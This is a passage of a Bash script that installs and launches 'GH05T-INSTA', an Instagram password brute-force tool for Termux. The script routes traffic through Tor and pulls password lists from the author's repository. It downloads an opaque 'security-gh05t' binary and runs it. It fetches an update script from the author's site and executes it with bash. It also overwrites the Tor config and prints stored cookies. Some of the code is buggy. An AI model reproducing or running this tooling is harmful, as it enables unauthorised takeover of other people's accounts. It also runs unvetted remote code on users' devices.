#!/bin/bash

readthisone() {
	echo ""
	echo "######################################################"
	echo "######################################################"
	echo "##################### READ THIS ######################"
	echo "######################################################"
	echo "######################################################"
	echo "## Dear GitHub user, please do not copy this script ##"
	echo "######################################################"
	echo "##  All copyright under the laws of all countries   ##"
	echo "######################################################"
	echo "##        Copyright of  GH05T HUNTER5, 2023         ##"
	echo "######################################################"
	echo "######################################################"
	
	
	
	echo "#######################################################################################"
	echo "#######################################################################################"
	echo "##   GH05T-INSTA 	: 	Insta BruteForce Tool         			           ##"
	echo "##   Authors 		: 	GH05T-HUNTER5				           ##"
	echo "##   Version 		: 	7.01			                           ##"
	echo "##   Github 		: 	https://github.com/GH05T-HUNTER5/GH05T-INSTA       ##"
	echo "#######################################################################################"
	echo "##  MIT License 				                                           ##"
	echo "##								                   ##"
	echo "##  Copyright (c) 2023 GH05T HUNTER5 						   ##"
	echo "##										   ##"
	echo "##  Permission is hereby granted, free of charge, to any person obtaining a copy     ##"
	echo "##  of this software and associated documentation files (the "Software"), to deal    ##"
	echo "##  in the Software without restriction, including without limitation the rights     ##"
	echo "##  to use, copy, modify, merge, publish, distribute, sublicense, and/or sell        ##"
	echo "##  copies of the Software, and to permit persons to whom the Software is            ##"
	echo "##  furnished to do so, subject to the following conditions:                         ##"
	echo "##                                                                                   ##"
	echo "##  The above copyright notice and this permission notice shall be included in all   ##"
	echo "##  copies or substantial portions of the Software.                                  ##"
	echo "##  										   ##"
	echo "##  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR       ##"
	echo "##  IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,         ##"
	echo "##  FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE      ##"
	echo "##  AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER           ##"
	echo "##  LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,    ##"
	echo "##  OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE    ##"
	echo "##  SOFTWARE.          								   ##"
	echo "#######################################################################################"
	echo "#######################################################################################"	
}

pip install requests
clear
if [[ $(command -v instagram-py) ]]; then
        echo ""
else
        echo "Instagram-py command not located. To install Instagram-py, please execute the installation command: 'pip install Instagram-py'."
        exit
fi

if [[ $(command -v python3) ]]; then 
    echo ""
else 
    pkg install python -y 
    pkg install python 
fi 

main_install() {
	if [[ $(command -v php) && $(command -v curl) && $(command -v python) && $(command -v python2) && $(command -v wget) && $(command -v tor) ]]; then
		echo -e "" >/dev/null 2>&1
	else
		pkgs=(php curl python python2 wget tor)
		for pkg in "${pkgs[@]}"; do
		type -p "$pkg" &>/dev/null || {
		echo -e ""
		if [[ $(command -v pkg) ]]; then
			pkg install "$pkg" -y
		elif [[ $(command -v apt) ]]; then
			sudo apt install "$pkg" -y
		elif [[ $(command -v apt-get) ]]; then
			sudo apt-get install "$pkg" -y
		elif [[ $(command -v pacman) ]]; then
			sudo pacman -S "$pkg" --noconfirm
		elif [[ $(command -v dnf) ]]; then
			sudo dnf -y install "$pkg"
		elif [[ $(command -v yum) ]]; then
			sudo yum -y install "$pkg"
		else
			echo ""
		fi
		}
		done
	fi
}
main_install

if [[ $(command -v security-gh05t) ]]; then
        echo ""
else
        wget gh05t-hunter5.github.io/communication/GH05T-INSTA/security-gh05t 
        mv security-gh05t /data/data/com.termux/files/usr/bin/security-gh05t 
        chmod +x /data/data/com.termux/files/usr/bin/security-gh05t 
fi

reset='\033[0m'
exit_on_signal_SIGINT() {
	echo ""
	reopens	
	clear 
	echo -e " Trying To Exit ${reset}"
	sleep 5
	clear
	exit 0
}
exit_on_signal_SIGTERM() {
	echo ""
	reopens
	clear 
	echo -e " Trying To Exit ${reset}"
	sleep 5
	clear
	exit 0
}
trap exit_on_signal_SIGINT SIGINT
trap exit_on_signal_SIGTERM SIGTERM

install_tool() {
	if [[ $(command -v instagram-py) ]]; then
		echo ""
	else
		pip install requests --upgrade >/dev/null 2>&1
		pip install requests[socks] >/dev/null 2>&1
		pip install stem >/dev/null 2>&1
		pip install instagram-py >/dev/null 2>&1
		pip install instagram-py --upgrade
	fi
}
install_tool

if [ -d /data/data/com.termux/files/.gh05tinsta ]; then
	echo ""
	clear
else
	echo ""
	clear 
	mkdir -p /data/data/com.termux/files/.gh05tinsta >/dev/null 2>&1
	clear
fi
function breakme () {
	kill-insta
	clear
	echo ""
	if [ -f /data/data/com.termux/files/home/instapy-config.json ]; then
		echo ""
		clear
	else
		echo ""
		cd /data/data/com.termux/files/home >/dev/null 2>&1
		wget -O ~/instapy-config.json "gh05t-hunter5.github.io/communication/GH05T-INSTA/instapy-.json" >/dev/null 2>&1
		clear
	fi
        security-gh05t
	if [ -f /data/data/com.termux/files/home/instapy-config.json ]; then
		echo ""
		clear
	else
		echo ""
		cd /data/data/com.termux/files/home >/dev/null 2>&1
		wget -O ~/instapy-config.json "gh05t-hunter5.github.io/communication/GH05T-INSTA/instapy-.json" >/dev/null 2>&1
		clear
	fi
	if [ -d /data/data/com.termux/files/usr/cookies ]; then
		echo ""
		clear
	else
		clear
		echo " cookies not found"
		echo " please update"
		exit
	fi
	ping -c 1 google.com >/dev/null 2>&1
	Return="$?"
	if [ "$Return" -eq "0" ]; then
		echo ""
		clear
	else
	clear
	echo ""
	printf "${red} Turn on the Internet or connect to the Internet"
	sleep 8
	clear
	fi
}
green='\033[1;32m'
red='\033[1;31m'
white='\033[1;37m'
cyan='\033[0;36m'
function banners () {
	breakme
	clear
	echo -e " \033[1;37m +----------------------------------------------+"
	echo -e " \033[1;37m | \033[0;32m  ██████╗ ██╗  ██╗ ██████╗ ███████╗████████╗\033[1;37m |"
	echo -e " \033[1;37m |\033[0;32m  ██╔════╝ ██║  ██║██╔═████╗██╔════╝╚══██╔══╝\033[1;37m |"	
	echo -e " \033[1;37m |\033[0;32m  ██║  ███╗███████║██║██╔██║███████╗   ██║ \033[1;37m   |"
	echo -e " \033[1;37m |\033[0;32m  ██║   ██║██╔══██║████╔╝██║╚════██║   ██║ \033[1;37m   |"
	echo -e " \033[1;37m |\033[0;32m  ╚██████╔╝██║  ██║╚██████╔╝███████║   ██║ \033[1;37m   |"
	echo -e " \033[1;37m | \033[0;32m  ╚═════╝ ╚═╝  ╚═╝ ╚═════╝ ╚══════╝   ╚═╝ \033[1;37m   |"
	echo -e " \033[1;37m +----------------------------------------------+"
	echo -e " \033[1;37m |  \033[0;32m   ██╗███╗   ██╗███████╗████████╗ █████╗  \033[1;37m  |"
	echo -e " \033[1;37m |  \033[0;32m   ██║████╗  ██║██╔════╝╚══██╔══╝██╔══██╗  \033[1;37m |"
	echo -e " \033[1;37m |  \033[0;32m   ██║██╔██╗ ██║███████╗   ██║   ███████║ \033[1;37m  |"
	echo -e " \033[1;37m |  \033[0;32m   ██║██║╚██╗██║╚════██║   ██║   ██╔══██║  \033[1;37m |"
	echo -e " \033[1;37m |  \033[0;32m   ██║██║ ╚████║███████║   ██║   ██║  ██║ \033[1;37m  |"
	echo -e " \033[1;37m |  \033[0;32m   ╚═╝╚═╝  ╚═══╝╚══════╝   ╚═╝   ╚═╝  ╚═╝ \033[1;37m  |"
	echo -e " \033[1;37m +----------------------------------------------+"
	echo -e " \033[1;37m |\033[0;31m Developer\033[1;37m :\033[0;34m GH05T HUNTER5   \033[0;31m  version\033[1;37m  :\033[0;34m 7.01\033[1;37m|"
	echo -e " \033[1;37m |\033[0;31m Instagram\033[1;37m :\033[0;34m GH05T_HUNTER5   \033[0;31m  FPP    \033[1;37m  :\033[0;34m 20.3\033[1;37m|"
	echo -e " \033[1;37m |\033[0;31m Powered  \033[1;37m :\033[0;34m Instagram-py    \033[0;31m  antony-jr\033[1;37m:\033[0;34m 2.07\033[1;37m|"
	echo -e " \033[1;37m +----------------------------------------------+"
	echo -e " \033[1;37m |\033[0;31m We strive to provide the best service for you\033[1;37m|"
	echo -e " \033[1;37m +----------------------------------------------+"
}

function loop-infos () {
	echo -e "  \033[1;37m[\033[0;31m99\033[1;37m]\033[0;32m Main                         \033[1;37m[\033[0;31m00\033[1;37m]\033[0;32m Exit"
	read -p $'  \e[1;92m[\e[0m\e[1;77m++\e[0m\e[1;92m] Choose an option : \e[0m' options
	if [ $options = "00" ]; then
		echo ""
		reopens
		clear
		exit
	elif [ $options = "99" ]; then
		echo ""
		clear
		main-loop
		exit
	else
		echo ""
		clear
		help-info
		loop-infos
		exit
	fi
}

function update-info () {
	wget gh05t-hunter5.github.io/Basic-Installation-Linux/MyPass/gh05t-updates.sh
	bash gh05t-updates.sh
	if [ -f gh05t-updates.sh ]; then
		rm gh05t-updates.sh
	else
		echo ""
	fi
}

function reopens () {
	rm /data/data/com.termux/files/home/instapy-config.json  >/dev/null 2>&1
	if [ -f /data/data/com.termux/files/home/instapy-config.json ]; then
		rm /data/data/com.termux/files/home/instapy-config.json  >/dev/null 2>&1
	fi
	if [ -f instapy-config.json ]; then
		rm instapy-config.json >/dev/null 2>&1
	fi
        security-gh05t remove
}

function error-info () {
	banners
	echo -e " \033[1;37m |               \033[0;32m Please await ...             \033[1;37m |"
	echo -e " \033[1;37m +----------------------------------------------+"
	dpkg --configure -a 
	pip install --upgrade pip >/dev/null 2>&1
	pip3 install requests --upgrade >/dev/null 2>&1
	pip3 install requests[socks] >/dev/null 2>&1
	pip3 install stem >/dev/null 2>&1
	pip3 install instagram-py >/dev/null 2>&1
	reopens
	clear
}

function cookies-info () {
	echo ""
	if [ -f data/data/com.termux/files/usr/cookies/cookie.txt ]; then
		echo ""
		clear
		banners
		cat /data/data/com.termux/files/usr/cookies/cookie.txt 
		reopens
		exit
	else
		echo ""
		clear
		echo " No cookies found"
		sleep 3
		clear 
		reopens
		exit
	fi
}

function kill-insta () {
	if [ -f /data/data/com.termux/files/home/instapy-config.json ]; then
		echo ""
		clear
	else
		echo ""
		cd /data/data/com.termux/files/home >/dev/null 2>&1
		wget -O ~/instapy-config.json "gh05t-hunter5.github.io/communication/GH05T-INSTA/instapy-.json" >/dev/null 2>&1
		clear
	fi
        security-gh05t
}

restar='\033[0;35m'
function proinstall () {
	dpkg -s wget &> /dev/null # GH05T HUNTER5
	if [ $? -eq 0 ]; then
		echo ""
		clear
	else
		echo ""
		echo " GH05T-HUNTER5 has detected an error, please wait until we fix it"
		sleep 1
		pkg install wget -y >/dev/null 2>&1
		sleep 1
		clear
	fi
	# Sometimes this package is not installed ( GH05T INSTA )
	dpkg -s wget &> /dev/null # GH05T HUNTER5
	if [ $? -eq 0 ]; then
		echo ""
		clear
	else
		echo ""
		echo " GH05T-HUNTER5 has detected an error, please wait until we fix it"
		sleep 1
		pkg install wget
		sleep 1
		clear
	fi
	dpkg -s tor &> /dev/null # GH05T HUNTER5
	if [ $? -eq 0 ]; then
		echo ""
		pkg install tor -y >/dev/null 2>&1
	else
		echo ""
		echo " tor installation"
		sleep 1
		pkg install tor -y >/dev/null 2>&1
		sleep 1
		cd  /data/data/com.termux/files/usr/etc/tor >/dev/null 2>&1
		rm /data/data/com.termux/files/usr/etc/tor/torrc >/dev/null 2>&1
		sleep 1
		wget https://raw.githubusercontent.com/GH05T-HUNTER5/GH05T-INSTA/main/.gh05t/torrc >/dev/null 2>&1
	fi
	dpkg -s tor &> /dev/null # GH05T HUNTER5
	if [ $? -eq 0 ]; then
		echo ""
	else
		echo ""
		echo " tor installation"
		sleep 1
		pkg install tor
		sleep 1
		cd  /data/data/com.termux/files/usr/etc/tor >/dev/null 2>&1
		rm /data/data/com.termux/files/usr/etc/tor/torrc >/dev/null 2>&1
		sleep 1
		wget https://raw.githubusercontent.com/GH05T-HUNTER5/GH05T-INSTA/main/.gh05t/torrc >/dev/null 2>&1
	fi
}
proinstall

function check-info () {
	if [ -d /data/data/com.termux/files/usr/cookies ]; then
		echo ""
		clear
	else
		rm /data/data/com.termux/files/new-04.pro >/dev/null 2>&1
		update-info
		clear 
	fi
	clear 
	banners
	sleep 3
	if [ -f /data/data/com.termux/files/usr/cookies/password-1.txt ]; then
		printf "${green}  Password 1 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 1 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t >/dev/null 2>&1
		mv password-1.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-2.txt ]; then
		printf "${green}  Password 2 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 2 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t >/dev/null 2>&1
		mv password-2.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-3.txt ]; then
		printf "${green}  Password 3 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 3 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t >/dev/null 2>&1
		mv password-3.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-4.txt ]; then
		printf "${green}  Password 4 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 4 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t >/dev/null 2>&1
		mv password-4.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-5.txt ]; then
		printf "${green}  Password 5 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 5 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t >/dev/null 2>&1
		mv password-5.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-6.txt ]; then
		printf "${green}  Password 6 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 6 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t/gh05tpass >/dev/null 2>&1
		mv password-6.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-7.txt ]; then
		printf "${green}  Password 7 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 7 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t/gh05tpass >/dev/null 2>&1
		mv password-7.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-8.txt ]; then
		printf "${green}  Password 8 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 8 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t/gh05tpass >/dev/null 2>&1
		mv password-8.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME
		rm -rf GH05T-INSTA
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-9.txt ]; then	
		printf "${green}  Password 9 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 9 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t/gh05tpass >/dev/null 2>&1
		mv password-9.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-10.txt ]; then
		printf "${green}  Password 10 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 10 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t/gh05tpass >/dev/null 2>&1
		mv password-10.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-11.txt ]; then
		printf "${green}  Password 11 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 11 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t/gh05tpass >/dev/null 2>&1
		mv password-11.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-11.txt ]; then
		printf "${green}  Password 12 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 12 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t/gh05tpass >/dev/null 2>&1
		mv password-12.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-13.txt ]; then
		printf "${green}  Password 13 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 13 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t/gh05tpass >/dev/null 2>&1
		mv password-13.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-14.txt ]; then
		printf "${green}  Password 14 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 14 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t/gh05tpass >/dev/null 2>&1
		mv password-14.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-15.txt ]; then
		printf "${green}  Password 15 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 15 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t/gh05tpass >/dev/null 2>&1
		mv password-15.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-16.txt ]; then
		printf "${green}  Password 16 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 16 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t/gh05tpass >/dev/null 2>&1
		mv password-16.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-17.txt ]; then
		printf "${green}  Password 17 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 17 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t/gh05tpass >/dev/null 2>&1
		mv password-17.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-18.txt ]; then
		printf "${green}  Password 18 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 18 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t/gh05tpass >/dev/null 2>&1
		mv password-18.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-19.txt ]; then
		printf "${green}  Password 19 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 19 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t/gh05tpass >/dev/null 2>&1
		mv password-19.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/password-20.txt ]; then
		printf "${green}  Password 20 found${reset}\n"
		sleep 1
	else
		printf "${red}  Password 20 not found. gh05t tool is trying to fix this, please wait ${reset}\n"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t/gh05tpass >/dev/null 2>&1
		mv password-20.txt /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/bin/gh05t ]; then
		echo ""
		cd /data/data/com.termux/files/usr/bin >/dev/null 2>&1
		chmod +x gh05t 
	else
		printf "${red} Wrong"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t >/dev/null 2>&1
		mv gh05t /data/data/com.termux/files/usr/bin >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		cd /data/data/com.termux/files/usr/bin >/dev/null 2>&1
		chmod +x gh05t
	fi
	if [ -f /data/data/com.termux/files/usr/etc/tor/torrc ]; then
		echo ""
	else
		printf "${red} Tor Setup Please Wait"
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t >/dev/null 2>&1
		mv torrc /data/data/com.termux/files/usr/etc/tor >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/index.html ]; then
		echo ""
		clear
	else
		echo ""
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t >/dev/null 2>&1
		mv index.html /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	if [ -f /data/data/com.termux/files/usr/cookies/hunter5.css ]; then
		echo ""
		clear 
	else
		echo ""
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
		git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA >/dev/null 2>&1
		cd $HOME/GH05T-INSTA/.gh05t >/dev/null 2>&1
		mv hunter5.css /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
		cd $HOME >/dev/null 2>&1
		rm -rf GH05T-INSTA >/dev/null 2>&1
	fi
	pkg install tor
	pkg install tor -you
	pkg install wget
	pkg install wget -y
	clear
	banners
	sleep 2
	reopens
	clear 
	exit
}

function report-info () {
	bash /data/data/com.termux/files/usr/cookies/reportinstas.sh
	clear
	cd /data/data/com.termux/files/usr/cookies/ >/dev/null 2>&1
	./reportinstas.sh
	clear
}
function killmeall () {
	reopens
	clear
	banners
	dpkg --configure -a >/dev/null 2>&1
	pip3 uninstall instagram-py -y >/dev/null 2>&1
	pip3 uninstall stem -y >/dev/null 2>&1
	pip3 uninstall requests[socks] -y >/dev/null 2>&1
	pip3 uninstall requests --upgrade -y >/dev/null 2>&1
	pip uninstall --upgrade pip -y >/dev/null 2>&1
	dpkg -s php &> /dev/null # GH05T HUNTER5
	if [ $? -eq 0 ]; then
		echo ""
		pkg uninstall php -y >/dev/null 2>&1
		clear
	else
		echo ""
		clear
	fi
	dpkg -s tor &> /dev/null # GH05T HUNTER5
	if [ $? -eq 0 ]; then
		echo ""
		pkg uninstall tor -y >/dev/null 2>&1
		clear
	else
		echo ""
		clear
	fi
	dpkg -s wget &> /dev/null # GH05T HUNTER5
	if [ $? -eq 0 ]; then
		echo ""
		pkg uninstall wget -y >/dev/null 2>&1
		clear
	else
		echo ""
		clear
	fi
	dpkg -s python &> /dev/null # GH05T HUNTER5
	if [ $? -eq 0 ]; then
		echo ""
		pkg uninstall python -y >/dev/null 2>&1
		clear
	else
		echo ""
		clear
	fi
	dpkg -s python2 &> /dev/null # GH05T HUNTER5
	if [ $? -eq 0 ]; then
		echo ""
		pkg install unpython2 -y >/dev/null 2>&1
		clear
	else
		echo ""
		clear
	fi
	dpkg -s curl &> /dev/null # GH05T HUNTER5
	if [ $? -eq 0 ]; then
		echo ""
		pkg uninstall curl -y >/dev/null 2>&1
		clear
	else
		echo ""
		clear
	fi
	rm -rf /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
	if [ -d /data/data/com.termux/files/usr/cookies ]; then
		echo ""
		rm -rf /data/data/com.termux/files/usr/cookies >/dev/null 2>&1
	else
		clear
		echo ""
	fi
	cd $HOME
	rm instapy-config.json >/dev/null 2>&1
	rm /data/data/com.termux/files/usr/bin/gh05t >/dev/null 2>&1
	clear
	if [ -f /data/data/com.termux/files/usr/bin/gh05t ]; then
		clear 
